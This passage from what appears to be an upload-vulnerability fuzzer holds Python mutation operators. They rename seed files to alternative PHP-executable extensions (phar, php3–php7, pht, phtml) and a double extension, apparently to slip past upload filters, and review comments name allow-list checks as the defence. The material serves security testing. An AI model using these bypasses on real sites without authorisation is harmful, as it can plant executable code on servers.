9 | __resource__ = {} # ({type:resource filename}) 10 | __seed_dependency__ = __exclusion_op__.keys()#["php","html","js"] # seed file dependency for operation 11 | 12 | def operation(self, output, seed_file, resource_file=None): 13 | if output['filename'] != None and len(output['filename']) > 0: 14 | filename = output['filename'] 15 | else: 16 | filename = utils.extract_filename(seed_file) 17 | 18 | output['filename'] = filename + '_M4PHAR' 19 | if '.' not in output['fileext']: 20 | output['fileext'] = 'phar' 21 | else: 22 | output['fileext'] = output['fileext'].rsplit('.',1)[0]+'.phar' 23 | 24 | -------------------------------------------------------------------------------- /mutation_op/m04_php3.py: -------------------------------------------------------------------------------- 1 | from mutation_op import * 2 | import utils 3 | 4 | class mOP(MutationOP): 5 | __comment__ = "Mutation4: Change Extensions to Mutation Resource File" 6 | __mutate_type__ = "file" # (file|request) ; type of target 7 | __exclusion_op__ = {'php':['M04_ACE', 'M04_ARC', 'M04_ARJ', 'M04_BZ2', 'M04_DFXP', 'M04_EPUB', 'M04_GIF', 'M04_GPX', 'M04_GZIP', 'M04_JPG', 'M04_M4V', 'M04_MPA', 'M04_MPP', 'M04_NUMBERS', 'M04_ONETOC', 'M04_OXPS', 'M04_PAGES', 'M04_PDF', 'M04_PHAR', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHTML', 'M04_PHT', 'M04_PNG', 'M04_TAR_GZ', 'M04_TXT', 'M04_WP', 'M04_WRI', 'M04_XHT', 'M04_XLA', 'M04_XLW', 'M04_XPS', 'M04_ZIP', 'M04_ZIPX','M07','M10'],'html':['M04_ACE', 'M04_ARC', 'M04_ARJ', 'M04_BZ2', 'M04_DFXP', 'M04_EPUB', 'M04_GIF', 'M04_GPX', 'M04_GZIP', 'M04_JPG', 'M04_M4V', 'M04_MPA', 'M04_MPP', 'M04_NUMBERS', 'M04_ONETOC', 'M04_OXPS', 'M04_PAGES', 'M04_PDF', 'M04_PHAR', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHTML', 'M04_PHT', 'M04_PNG', 'M04_TAR_GZ', 'M04_TXT', 'M04_WP', 'M04_WRI', 'M04_XHT', 'M04_XLA', 'M04_XLW', 'M04_XPS', 'M04_ZIP', 'M04_ZIPX','M06','M07','M08','M10'],'xhtml':['M04_ACE', 'M04_ARC', 'M04_ARJ', 'M04_BZ2', 'M04_DFXP', 'M04_EPUB', 
'M04_GIF', 'M04_GPX', 'M04_GZIP', 'M04_JPG', 'M04_M4V', 'M04_MPA', 'M04_MPP', 'M04_NUMBERS', 'M04_ONETOC', 'M04_OXPS', 'M04_PAGES', 'M04_PDF', 'M04_PHAR', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHTML', 'M04_PHT', 'M04_PNG', 'M04_TAR_GZ', 'M04_TXT', 'M04_WP', 'M04_WRI', 'M04_XHT', 'M04_XLA', 'M04_XLW', 'M04_XPS', 'M04_ZIP', 'M04_ZIPX','M06','M07','M08','M10'],'js':['M10','M07','M04_ACE', 'M04_ARC', 'M04_ARJ', 'M04_BZ2', 'M04_DFXP', 'M04_EPUB', 'M04_GIF', 'M04_GPX', 'M04_GZIP', 'M04_JPG', 'M04_M4V', 'M04_MPA', 'M04_MPP', 'M04_NUMBERS', 'M04_ONETOC', 'M04_OXPS', 'M04_PAGES', 'M04_PDF', 'M04_PHAR', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHTML', 'M04_PHT', 'M04_PNG', 'M04_TAR_GZ', 'M04_TXT', 'M04_WP', 'M04_WRI', 'M04_XHT', 'M04_XLA', 'M04_XLW', 'M04_XPS', 'M04_ZIP', 'M04_ZIPX']}#['M04_JPG', 'M04_PNG', 'M04_GIF', 'M04_ZIP', 'M04_TAR_GZ', 'M04_PDF', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHAR', 'M04_PHT', 'M04_PHTML', 'M04_TXT', 'M06', 'M07_PHP', 'M07_OTHER', 'M08', 'M10'] # ([classname])when this op used for mutation,
    # operations in this list can be used to extra mutation.
    __resource__ = {} # ({type:resource filename})
    __seed_dependency__ = __exclusion_op__.keys()#["php","html","js"] # seed file dependency for operation

    def operation(self, output, seed_file, resource_file=None):
        """Tag the output name with ``_M4PHP3`` and make ``php3`` its final extension.

        ``output`` is modified in place through its ``'filename'`` and
        ``'fileext'`` keys. ``seed_file`` is passed to
        ``utils.extract_filename`` only when ``output`` has no filename yet;
        ``resource_file`` is not used here.
        """
        # NOTE(review): presumably checks whether an upload filter still accepts
        # this alternative extension; validating the final extension against an
        # allow-list is the matching defence. Confirm against the tester.
        current_name = output['filename']
        if current_name is None or len(current_name) == 0:
            stem = utils.extract_filename(seed_file)
        else:
            stem = current_name
        output['filename'] = stem + '_M4PHP3'

        ext = output['fileext']
        if '.' in ext:
            # Keep what precedes the last dot and swap only the final segment.
            output['fileext'] = ext.rsplit('.', 1)[0] + '.php3'
        else:
            output['fileext'] = 'php3'

--------------------------------------------------------------------------------
/mutation_op/m04_php4.py:
--------------------------------------------------------------------------------
from mutation_op import *
import utils

class mOP(MutationOP):
    __comment__ = "Mutation4: Change Extensions to Mutation Resource File"
    __mutate_type__ = "file" # (file|request) ; type of target
    __exclusion_op__ = {'php':['M04_ACE', 'M04_ARC', 'M04_ARJ', 'M04_BZ2', 'M04_DFXP', 'M04_EPUB', 'M04_GIF', 'M04_GPX', 'M04_GZIP', 'M04_JPG', 'M04_M4V', 'M04_MPA', 'M04_MPP', 'M04_NUMBERS', 'M04_ONETOC', 'M04_OXPS', 'M04_PAGES', 'M04_PDF', 'M04_PHAR', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHTML', 'M04_PHT', 'M04_PNG', 'M04_TAR_GZ', 'M04_TXT', 'M04_WP', 'M04_WRI', 'M04_XHT', 'M04_XLA', 'M04_XLW', 'M04_XPS', 'M04_ZIP', 'M04_ZIPX','M07','M10'],'html':['M04_ACE', 'M04_ARC', 'M04_ARJ', 'M04_BZ2', 'M04_DFXP', 'M04_EPUB', 'M04_GIF', 'M04_GPX', 'M04_GZIP', 'M04_JPG', 'M04_M4V', 'M04_MPA', 'M04_MPP', 'M04_NUMBERS', 'M04_ONETOC', 'M04_OXPS', 'M04_PAGES', 'M04_PDF', 'M04_PHAR', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHTML', 'M04_PHT', 'M04_PNG', 'M04_TAR_GZ', 'M04_TXT', 'M04_WP', 'M04_WRI', 'M04_XHT', 'M04_XLA', 'M04_XLW', 'M04_XPS', 'M04_ZIP', 'M04_ZIPX','M06','M07','M08','M10'],'xhtml':['M04_ACE', 'M04_ARC', 'M04_ARJ', 'M04_BZ2', 'M04_DFXP', 'M04_EPUB', 'M04_GIF', 'M04_GPX', 'M04_GZIP', 'M04_JPG', 'M04_M4V', 'M04_MPA', 'M04_MPP', 'M04_NUMBERS', 'M04_ONETOC', 'M04_OXPS', 'M04_PAGES', 'M04_PDF', 'M04_PHAR', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHTML', 'M04_PHT', 'M04_PNG', 'M04_TAR_GZ', 'M04_TXT', 'M04_WP', 'M04_WRI', 'M04_XHT', 'M04_XLA', 'M04_XLW', 'M04_XPS', 'M04_ZIP', 'M04_ZIPX','M06','M07','M08','M10'],'js':['M10','M07','M04_ACE', 'M04_ARC', 'M04_ARJ', 'M04_BZ2', 'M04_DFXP',
'M04_EPUB', 'M04_GIF', 'M04_GPX', 'M04_GZIP', 'M04_JPG', 'M04_M4V', 'M04_MPA', 'M04_MPP', 'M04_NUMBERS', 'M04_ONETOC', 'M04_OXPS', 'M04_PAGES', 'M04_PDF', 'M04_PHAR', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHTML', 'M04_PHT', 'M04_PNG', 'M04_TAR_GZ', 'M04_TXT', 'M04_WP', 'M04_WRI', 'M04_XHT', 'M04_XLA', 'M04_XLW', 'M04_XPS', 'M04_ZIP', 'M04_ZIPX']}#['M04_JPG', 'M04_PNG', 'M04_GIF', 'M04_ZIP', 'M04_TAR_GZ', 'M04_PDF', 'M04_PHP3', 'M04_PHP5', 'M04_PHP7', 'M04_PHAR', 'M04_PHT', 'M04_PHTML', 'M04_TXT', 'M06', 'M07_PHP', 'M07_OTHER', 'M08', 'M10'] # ([classname])when this op used for mutation,
    # operations in this list can be used to extra mutation.
    __resource__ = {} # ({type:resource filename})
    __seed_dependency__ = __exclusion_op__.keys()#["php","html","js"] # seed file dependency for operation

    def operation(self, output, seed_file, resource_file=None):
        """Tag the output name with ``_M4PHP4`` and make ``php4`` its final extension.

        ``output`` is modified in place through its ``'filename'`` and
        ``'fileext'`` keys. ``seed_file`` is passed to
        ``utils.extract_filename`` only when ``output`` has no filename yet;
        ``resource_file`` is not used here.
        """
        # NOTE(review): presumably checks whether an upload filter still accepts
        # this alternative extension; validating the final extension against an
        # allow-list is the matching defence. Confirm against the tester.
        current_name = output['filename']
        if current_name is None or len(current_name) == 0:
            stem = utils.extract_filename(seed_file)
        else:
            stem = current_name
        output['filename'] = stem + '_M4PHP4'

        ext = output['fileext']
        if '.' in ext:
            # Keep what precedes the last dot and swap only the final segment.
            output['fileext'] = ext.rsplit('.', 1)[0] + '.php4'
        else:
            output['fileext'] = 'php4'

--------------------------------------------------------------------------------
/mutation_op/m04_php5.py:
--------------------------------------------------------------------------------
from mutation_op import *
import utils

class mOP(MutationOP):
    __comment__ = "Mutation4: Change Extensions to Mutation Resource File"
    __mutate_type__ = "file" # (file|request) ; type of target
    __exclusion_op__ = {'php':['M04_ACE', 'M04_ARC', 'M04_ARJ', 'M04_BZ2', 'M04_DFXP', 'M04_EPUB', 'M04_GIF', 'M04_GPX', 'M04_GZIP', 'M04_JPG', 'M04_M4V', 'M04_MPA', 'M04_MPP', 'M04_NUMBERS', 'M04_ONETOC', 'M04_OXPS', 'M04_PAGES', 'M04_PDF', 'M04_PHAR', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHTML', 'M04_PHT', 'M04_PNG', 'M04_TAR_GZ', 'M04_TXT', 'M04_WP', 'M04_WRI', 'M04_XHT', 'M04_XLA', 'M04_XLW', 'M04_XPS', 'M04_ZIP', 'M04_ZIPX','M07','M10'],'html':['M04_ACE', 'M04_ARC', 'M04_ARJ', 'M04_BZ2', 'M04_DFXP', 'M04_EPUB', 'M04_GIF', 'M04_GPX', 'M04_GZIP', 'M04_JPG', 'M04_M4V', 'M04_MPA', 'M04_MPP', 'M04_NUMBERS', 'M04_ONETOC', 'M04_OXPS', 'M04_PAGES', 'M04_PDF', 'M04_PHAR', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHTML', 'M04_PHT', 'M04_PNG', 'M04_TAR_GZ', 'M04_TXT', 'M04_WP', 'M04_WRI', 'M04_XHT', 'M04_XLA', 'M04_XLW', 'M04_XPS', 'M04_ZIP', 'M04_ZIPX','M06','M07','M08','M10'],'xhtml':['M04_ACE', 'M04_ARC', 'M04_ARJ', 'M04_BZ2', 'M04_DFXP', 'M04_EPUB', 'M04_GIF', 'M04_GPX', 'M04_GZIP', 'M04_JPG', 'M04_M4V', 'M04_MPA', 'M04_MPP', 'M04_NUMBERS', 'M04_ONETOC', 'M04_OXPS', 'M04_PAGES', 'M04_PDF', 'M04_PHAR', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHTML', 'M04_PHT', 'M04_PNG', 'M04_TAR_GZ', 'M04_TXT', 'M04_WP', 'M04_WRI', 'M04_XHT', 'M04_XLA', 'M04_XLW', 'M04_XPS', 'M04_ZIP', 'M04_ZIPX','M06','M07','M08','M10'],'js':['M10','M07','M04_ACE', 'M04_ARC', 'M04_ARJ', 'M04_BZ2', 'M04_DFXP',
'M04_EPUB', 'M04_GIF', 'M04_GPX', 'M04_GZIP', 'M04_JPG', 'M04_M4V', 'M04_MPA', 'M04_MPP', 'M04_NUMBERS', 'M04_ONETOC', 'M04_OXPS', 'M04_PAGES', 'M04_PDF', 'M04_PHAR', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHTML', 'M04_PHT', 'M04_PNG', 'M04_TAR_GZ', 'M04_TXT', 'M04_WP', 'M04_WRI', 'M04_XHT', 'M04_XLA', 'M04_XLW', 'M04_XPS', 'M04_ZIP', 'M04_ZIPX']}#['M04_JPG', 'M04_PNG', 'M04_GIF', 'M04_ZIP', 'M04_TAR_GZ', 'M04_PDF', 'M04_PHP3', 'M04_PHP4', 'M04_PHP7', 'M04_PHAR', 'M04_PHT', 'M04_PHTML', 'M04_TXT', 'M06', 'M07_PHP', 'M07_OTHER', 'M08', 'M10'] # ([classname])when this op used for mutation,
    # operations in this list can be used to extra mutation.
    __resource__ = {} # ({type:resource filename})
    __seed_dependency__ = __exclusion_op__.keys()#["php","html","js"] # seed file dependency for operation

    def operation(self, output, seed_file, resource_file=None):
        """Tag the output name with ``_M4PHP5`` and make ``php5`` its final extension.

        ``output`` is modified in place through its ``'filename'`` and
        ``'fileext'`` keys. ``seed_file`` is passed to
        ``utils.extract_filename`` only when ``output`` has no filename yet;
        ``resource_file`` is not used here.
        """
        # NOTE(review): presumably checks whether an upload filter still accepts
        # this alternative extension; validating the final extension against an
        # allow-list is the matching defence. Confirm against the tester.
        current_name = output['filename']
        if current_name is None or len(current_name) == 0:
            stem = utils.extract_filename(seed_file)
        else:
            stem = current_name
        output['filename'] = stem + '_M4PHP5'

        ext = output['fileext']
        if '.' in ext:
            # Keep what precedes the last dot and swap only the final segment.
            output['fileext'] = ext.rsplit('.', 1)[0] + '.php5'
        else:
            output['fileext'] = 'php5'

--------------------------------------------------------------------------------
/mutation_op/m04_php7.py:
--------------------------------------------------------------------------------
from mutation_op import *
import utils

class mOP(MutationOP):
    __comment__ = "Mutation4: Change Extensions to Mutation Resource File"
    __mutate_type__ = "file" # (file|request) ; type of target
    __exclusion_op__ = {'php':['M04_ACE', 'M04_ARC', 'M04_ARJ', 'M04_BZ2', 'M04_DFXP', 'M04_EPUB', 'M04_GIF', 'M04_GPX', 'M04_GZIP', 'M04_JPG', 'M04_M4V', 'M04_MPA', 'M04_MPP', 'M04_NUMBERS', 'M04_ONETOC', 'M04_OXPS', 'M04_PAGES', 'M04_PDF', 'M04_PHAR', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHTML', 'M04_PHT', 'M04_PNG', 'M04_TAR_GZ', 'M04_TXT', 'M04_WP', 'M04_WRI', 'M04_XHT', 'M04_XLA', 'M04_XLW', 'M04_XPS', 'M04_ZIP', 'M04_ZIPX','M07','M10'],'html':['M04_ACE', 'M04_ARC', 'M04_ARJ', 'M04_BZ2', 'M04_DFXP', 'M04_EPUB', 'M04_GIF', 'M04_GPX', 'M04_GZIP', 'M04_JPG', 'M04_M4V', 'M04_MPA', 'M04_MPP', 'M04_NUMBERS', 'M04_ONETOC', 'M04_OXPS', 'M04_PAGES', 'M04_PDF', 'M04_PHAR', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHTML', 'M04_PHT', 'M04_PNG', 'M04_TAR_GZ', 'M04_TXT', 'M04_WP', 'M04_WRI', 'M04_XHT', 'M04_XLA', 'M04_XLW', 'M04_XPS', 'M04_ZIP', 'M04_ZIPX','M06','M07','M08','M10'],'xhtml':['M04_ACE', 'M04_ARC', 'M04_ARJ', 'M04_BZ2', 'M04_DFXP', 'M04_EPUB', 'M04_GIF', 'M04_GPX', 'M04_GZIP', 'M04_JPG', 'M04_M4V', 'M04_MPA', 'M04_MPP', 'M04_NUMBERS', 'M04_ONETOC', 'M04_OXPS', 'M04_PAGES', 'M04_PDF', 'M04_PHAR', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHTML', 'M04_PHT', 'M04_PNG', 'M04_TAR_GZ', 'M04_TXT', 'M04_WP', 'M04_WRI', 'M04_XHT', 'M04_XLA', 'M04_XLW', 'M04_XPS', 'M04_ZIP', 'M04_ZIPX','M06','M07','M08','M10'],'js':['M10','M07','M04_ACE', 'M04_ARC', 'M04_ARJ', 'M04_BZ2', 'M04_DFXP',
'M04_EPUB', 'M04_GIF', 'M04_GPX', 'M04_GZIP', 'M04_JPG', 'M04_M4V', 'M04_MPA', 'M04_MPP', 'M04_NUMBERS', 'M04_ONETOC', 'M04_OXPS', 'M04_PAGES', 'M04_PDF', 'M04_PHAR', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHTML', 'M04_PHT', 'M04_PNG', 'M04_TAR_GZ', 'M04_TXT', 'M04_WP', 'M04_WRI', 'M04_XHT', 'M04_XLA', 'M04_XLW', 'M04_XPS', 'M04_ZIP', 'M04_ZIPX']}# ['M04_JPG', 'M04_PNG', 'M04_GIF', 'M04_ZIP', 'M04_TAR_GZ', 'M04_PDF', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHAR', 'M04_PHT', 'M04_PHTML', 'M04_TXT', 'M06', 'M07_PHP', 'M07_OTHER', 'M08', 'M10'] # ([classname])when this op used for mutation,
    # operations in this list can be used to extra mutation.
    __resource__ = {} # ({type:resource filename})
    __seed_dependency__ = __exclusion_op__.keys()#["php","html","js"] # seed file dependency for operation

    def operation(self, output, seed_file, resource_file=None):
        """Tag the output name with ``_M4PHP7`` and make ``php7`` its final extension.

        ``output`` is modified in place through its ``'filename'`` and
        ``'fileext'`` keys. ``seed_file`` is passed to
        ``utils.extract_filename`` only when ``output`` has no filename yet;
        ``resource_file`` is not used here.
        """
        # NOTE(review): presumably checks whether an upload filter still accepts
        # this alternative extension; validating the final extension against an
        # allow-list is the matching defence. Confirm against the tester.
        current_name = output['filename']
        if current_name is None or len(current_name) == 0:
            stem = utils.extract_filename(seed_file)
        else:
            stem = current_name
        output['filename'] = stem + '_M4PHP7'

        ext = output['fileext']
        if '.' in ext:
            # Keep what precedes the last dot and swap only the final segment.
            output['fileext'] = ext.rsplit('.', 1)[0] + '.php7'
        else:
            output['fileext'] = 'php7'

--------------------------------------------------------------------------------
/mutation_op/m04_pht.py:
--------------------------------------------------------------------------------
from mutation_op import *
import utils

class mOP(MutationOP):
    __comment__ = "Mutation4: Change Extensions to Mutation Resource File"
    __mutate_type__ = "file" # (file|request) ; type of target
    __exclusion_op__ = {'php':['M04_ACE', 'M04_ARC', 'M04_ARJ', 'M04_BZ2', 'M04_DFXP', 'M04_EPUB', 'M04_GIF', 'M04_GPX', 'M04_GZIP', 'M04_JPG', 'M04_M4V', 'M04_MPA', 'M04_MPP', 'M04_NUMBERS', 'M04_ONETOC', 'M04_OXPS', 'M04_PAGES', 'M04_PDF', 'M04_PHAR', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHTML', 'M04_PHT', 'M04_PNG', 'M04_TAR_GZ', 'M04_TXT', 'M04_WP', 'M04_WRI', 'M04_XHT', 'M04_XLA', 'M04_XLW', 'M04_XPS', 'M04_ZIP', 'M04_ZIPX','M07','M10'],'html':['M04_ACE', 'M04_ARC', 'M04_ARJ', 'M04_BZ2', 'M04_DFXP', 'M04_EPUB', 'M04_GIF', 'M04_GPX', 'M04_GZIP', 'M04_JPG', 'M04_M4V', 'M04_MPA', 'M04_MPP', 'M04_NUMBERS', 'M04_ONETOC', 'M04_OXPS', 'M04_PAGES', 'M04_PDF', 'M04_PHAR', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHTML', 'M04_PHT', 'M04_PNG', 'M04_TAR_GZ', 'M04_TXT', 'M04_WP', 'M04_WRI', 'M04_XHT', 'M04_XLA', 'M04_XLW', 'M04_XPS', 'M04_ZIP', 'M04_ZIPX','M06','M07','M08','M10'],'xhtml':['M04_ACE', 'M04_ARC', 'M04_ARJ', 'M04_BZ2', 'M04_DFXP', 'M04_EPUB', 'M04_GIF', 'M04_GPX', 'M04_GZIP', 'M04_JPG', 'M04_M4V', 'M04_MPA', 'M04_MPP', 'M04_NUMBERS', 'M04_ONETOC', 'M04_OXPS', 'M04_PAGES', 'M04_PDF', 'M04_PHAR', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHTML', 'M04_PHT', 'M04_PNG', 'M04_TAR_GZ', 'M04_TXT', 'M04_WP', 'M04_WRI', 'M04_XHT', 'M04_XLA', 'M04_XLW', 'M04_XPS', 'M04_ZIP', 'M04_ZIPX','M06','M07','M08','M10'],'js':['M10','M07','M04_ACE', 'M04_ARC', 'M04_ARJ', 'M04_BZ2', 'M04_DFXP',
'M04_EPUB', 'M04_GIF', 'M04_GPX', 'M04_GZIP', 'M04_JPG', 'M04_M4V', 'M04_MPA', 'M04_MPP', 'M04_NUMBERS', 'M04_ONETOC', 'M04_OXPS', 'M04_PAGES', 'M04_PDF', 'M04_PHAR', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHTML', 'M04_PHT', 'M04_PNG', 'M04_TAR_GZ', 'M04_TXT', 'M04_WP', 'M04_WRI', 'M04_XHT', 'M04_XLA', 'M04_XLW', 'M04_XPS', 'M04_ZIP', 'M04_ZIPX']}#['M04_JPG', 'M04_PNG', 'M04_GIF', 'M04_ZIP', 'M04_TAR_GZ', 'M04_PDF', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHAR', 'M04_PHTML', 'M04_TXT', 'M06', 'M07_PHP', 'M07_OTHER', 'M08', 'M10'] # ([classname])when this op used for mutation,
    # operations in this list can be used to extra mutation.
    __resource__ = {} # ({type:resource filename})
    __seed_dependency__ = __exclusion_op__.keys()#["php","html","js"] # seed file dependency for operation

    def operation(self, output, seed_file, resource_file=None):
        """Tag the output name with ``_M4PHT`` and make ``pht`` its final extension.

        ``output`` is modified in place through its ``'filename'`` and
        ``'fileext'`` keys. ``seed_file`` is passed to
        ``utils.extract_filename`` only when ``output`` has no filename yet;
        ``resource_file`` is not used here.
        """
        # NOTE(review): presumably checks whether an upload filter still accepts
        # this alternative extension; validating the final extension against an
        # allow-list is the matching defence. Confirm against the tester.
        current_name = output['filename']
        if current_name is None or len(current_name) == 0:
            stem = utils.extract_filename(seed_file)
        else:
            stem = current_name
        output['filename'] = stem + '_M4PHT'

        ext = output['fileext']
        if '.' in ext:
            # Keep what precedes the last dot and swap only the final segment.
            output['fileext'] = ext.rsplit('.', 1)[0] + '.pht'
        else:
            output['fileext'] = 'pht'

--------------------------------------------------------------------------------
/mutation_op/m04_phtml.py:
--------------------------------------------------------------------------------
from mutation_op import *
import utils

class mOP(MutationOP):
    __comment__ = "Mutation4: Change Extensions to Mutation Resource File"
    __mutate_type__ = "file" # (file|request) ; type of target
    __exclusion_op__ = {'php':['M04_ACE', 'M04_ARC', 'M04_ARJ', 'M04_BZ2', 'M04_DFXP', 'M04_EPUB', 'M04_GIF', 'M04_GPX', 'M04_GZIP', 'M04_JPG', 'M04_M4V', 'M04_MPA', 'M04_MPP', 'M04_NUMBERS', 'M04_ONETOC', 'M04_OXPS', 'M04_PAGES', 'M04_PDF', 'M04_PHAR', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHTML', 'M04_PHT', 'M04_PNG', 'M04_TAR_GZ', 'M04_TXT', 'M04_WP', 'M04_WRI', 'M04_XHT', 'M04_XLA', 'M04_XLW', 'M04_XPS', 'M04_ZIP', 'M04_ZIPX','M07','M10'],'html':['M04_ACE', 'M04_ARC', 'M04_ARJ', 'M04_BZ2', 'M04_DFXP', 'M04_EPUB', 'M04_GIF', 'M04_GPX', 'M04_GZIP', 'M04_JPG', 'M04_M4V', 'M04_MPA', 'M04_MPP', 'M04_NUMBERS', 'M04_ONETOC', 'M04_OXPS', 'M04_PAGES', 'M04_PDF', 'M04_PHAR', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHTML', 'M04_PHT', 'M04_PNG', 'M04_TAR_GZ', 'M04_TXT', 'M04_WP', 'M04_WRI', 'M04_XHT', 'M04_XLA', 'M04_XLW', 'M04_XPS', 'M04_ZIP', 'M04_ZIPX','M06','M07','M08','M10'],'xhtml':['M04_ACE', 'M04_ARC', 'M04_ARJ', 'M04_BZ2', 'M04_DFXP', 'M04_EPUB', 'M04_GIF', 'M04_GPX', 'M04_GZIP', 'M04_JPG', 'M04_M4V', 'M04_MPA', 'M04_MPP', 'M04_NUMBERS', 'M04_ONETOC', 'M04_OXPS', 'M04_PAGES', 'M04_PDF', 'M04_PHAR', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHTML', 'M04_PHT', 'M04_PNG', 'M04_TAR_GZ', 'M04_TXT', 'M04_WP', 'M04_WRI', 'M04_XHT', 'M04_XLA', 'M04_XLW', 'M04_XPS', 'M04_ZIP', 'M04_ZIPX','M06','M07','M08','M10'],'js':['M10','M07','M04_ACE', 'M04_ARC', 'M04_ARJ', 'M04_BZ2', 'M04_DFXP',
'M04_EPUB', 'M04_GIF', 'M04_GPX', 'M04_GZIP', 'M04_JPG', 'M04_M4V', 'M04_MPA', 'M04_MPP', 'M04_NUMBERS', 'M04_ONETOC', 'M04_OXPS', 'M04_PAGES', 'M04_PDF', 'M04_PHAR', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHTML', 'M04_PHT', 'M04_PNG', 'M04_TAR_GZ', 'M04_TXT', 'M04_WP', 'M04_WRI', 'M04_XHT', 'M04_XLA', 'M04_XLW', 'M04_XPS', 'M04_ZIP', 'M04_ZIPX']}# ['M04_JPG', 'M04_PNG', 'M04_GIF', 'M04_ZIP', 'M04_TAR_GZ', 'M04_PDF', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHAR', 'M04_PHT', 'M04_TXT', 'M06', 'M07_PHP', 'M07_OTHER', 'M08', 'M10'] # ([classname])when this op used for mutation,
    # operations in this list can be used to extra mutation.
    __resource__ = {} # ({type:resource filename})
    __seed_dependency__ = __exclusion_op__.keys()#["php","html","js"] # seed file dependency for operation

    def operation(self, output, seed_file, resource_file=None):
        """Tag the output name with ``_M4PHTML`` and make ``phtml`` its final extension.

        ``output`` is modified in place through its ``'filename'`` and
        ``'fileext'`` keys. ``seed_file`` is passed to
        ``utils.extract_filename`` only when ``output`` has no filename yet;
        ``resource_file`` is not used here.
        """
        # NOTE(review): presumably checks whether an upload filter still accepts
        # this alternative extension; validating the final extension against an
        # allow-list is the matching defence. Confirm against the tester.
        current_name = output['filename']
        if current_name is None or len(current_name) == 0:
            stem = utils.extract_filename(seed_file)
        else:
            stem = current_name
        output['filename'] = stem + '_M4PHTML'

        ext = output['fileext']
        if '.' in ext:
            # Keep what precedes the last dot and swap only the final segment.
            output['fileext'] = ext.rsplit('.', 1)[0] + '.phtml'
        else:
            output['fileext'] = 'phtml'

--------------------------------------------------------------------------------
/mutation_op/m12_txt.py:
--------------------------------------------------------------------------------
from mutation_op import *
import utils

class mOP(MutationOP):
    __comment__ = "Mutation12: Double extension"
    __mutate_type__ = "file" # (file|request) ; type of target
    __exclusion_op__ = {'js':['M12_ACE', 'M12_ARC', 'M12_ARJ', 'M12_BZ2', 'M12_DFXP', 'M12_EPUB', 'M12_GIF', 'M12_GPX', 'M12_GZIP', 'M12_JPG', 'M12_M4V', 'M12_MPA', 'M12_MPP', 'M12_NUMBERS', 'M12_ONETOC', 'M12_OXPS', 'M12_PAGES', 'M12_PDF', 'M12_PNG', 'M12_TAR_GZ', 'M12_TXT', 'M12_WP', 'M12_WRI', 'M12_XHT', 'M12_XLA', 'M12_XLW', 'M12_XPS', 'M12_ZIP', 'M12_HTML','M12_XHTML','M12_ZIPX']}
    # operations in this list can be used to extra mutation.

    # 'php':['M07', 'M10', 'M12_ACE', 'M12_ARC', 'M12_ARJ', 'M12_BZ2', 'M12_DFXP', 'M12_EPUB', 'M12_GIF', 'M12_GPX', 'M12_GZIP', 'M12_JPG', 'M12_M4V', 'M12_MPA', 'M12_MPP', 'M12_NUMBERS', 'M12_ONETOC', 'M12_OXPS', 'M12_PAGES', 'M12_PDF', 'M12_PNG', 'M12_TAR_GZ', 'M12_TXT', 'M12_WP', 'M12_WRI', 'M12_XHT', 'M12_XLA', 'M12_XLW', 'M12_XPS', 'M12_ZIP', 'M12_ZIPX'],
    # 'html':['M04_ACE', 'M04_ARC', 'M04_ARJ', 'M04_BZ2', 'M04_DFXP', 'M04_EPUB', 'M04_GIF', 'M04_GPX', 'M04_GZIP', 'M04_JPG', 'M04_M4V', 'M04_MPA', 'M04_MPP', 'M04_NUMBERS', 'M04_ONETOC', 'M04_OXPS', 'M04_PAGES', 'M04_PDF', 'M04_PHAR', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHTML', 'M04_PHT', 'M04_PNG', 'M04_TAR_GZ', 'M04_TXT', 'M04_WP', 'M04_WRI', 'M04_XHT', 'M04_XLA', 'M04_XLW', 'M04_XPS', 'M04_ZIP', 'M04_ZIPX', 'M06', 'M10', 'M07', 'M12_ACE', 'M12_ARC', 'M12_ARJ', 'M12_BZ2', 'M12_DFXP', 'M12_EPUB', 'M12_GIF', 'M12_GPX', 'M12_GZIP', 'M12_JPG', 'M12_M4V', 'M12_MPA', 'M12_MPP', 'M12_NUMBERS', 'M12_ONETOC', 'M12_OXPS', 'M12_PAGES',
